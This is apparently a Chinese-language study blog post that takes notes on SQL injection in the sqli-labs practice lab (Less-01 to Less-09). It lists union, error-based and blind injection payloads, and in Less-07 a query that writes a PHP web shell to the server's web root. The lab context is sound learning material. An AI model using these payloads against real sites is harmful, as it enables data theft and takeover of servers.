引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!
往期博客:
第一阶段:
[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
第二阶段:
第三阶段:
[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)
[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句
第四阶段:
[网络安全学习篇55]:SQL自动化注入(本篇)
下期博文:
目录
自动化注入
半自动化
burp
全自动
sqlmap
定制化脚本
sqli-labs题库
Less-01
字符型注入
单引号
?id=1
?id=1' and 1=2 union select 1,version(),3 --+
Less-02
数字型注入
?id=-2 union select 1,2,version()
Less-03
字符型注入
near ''1'') LIMIT 0,1' at line 1
')
?id=1') and 1=2 union select 1,2,version()--+
Less-04
字符型注入
")
?id=2") and 1=2 union select 1,2,version()--+
Less-05
没有回显,有报错
字符型注入
单引号
?id=3' and updatexml(1,concat(0x5e,version(),0x5e),1)--+
Less-06
没有回显,有报错
字符型注入
"
?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)--+
Less-07
没有回显,没有报错
经过代码审计
字符型注入
'))
?id=2')) union select 1,"<[email protected](\$_REQUEST[777])?>",3 into outfile "c:\\phpstudy\\www\\1.php"--+
Less-08
没有回显,没有报错,有布尔类型状态
字符型注入
'
布尔盲注
半自动化注入
工具:bp
*得到数据库名长度
?id=2' and length(database())=2 --+
抓包
选择字典
start attack
得到数据库名的长度 8
*获取数据库名
?id=2' and ascii(substr(database(),1,1))=1--+
字典
第一个变量1-8
第二个变量1-128
start attack
Less-09
字符型注入,单引号
没有回显,没有报错,没有布尔类型状态,有延时
半自动化注入
*获取数据库长度
?id=1' and if(length(database())=1,sleep(5),1)--+
抓包
添加变量
字典 0-9
*获取数据库名
抓包
字典
变量1:1-8
变量2:1-128
获取成功
参考文献: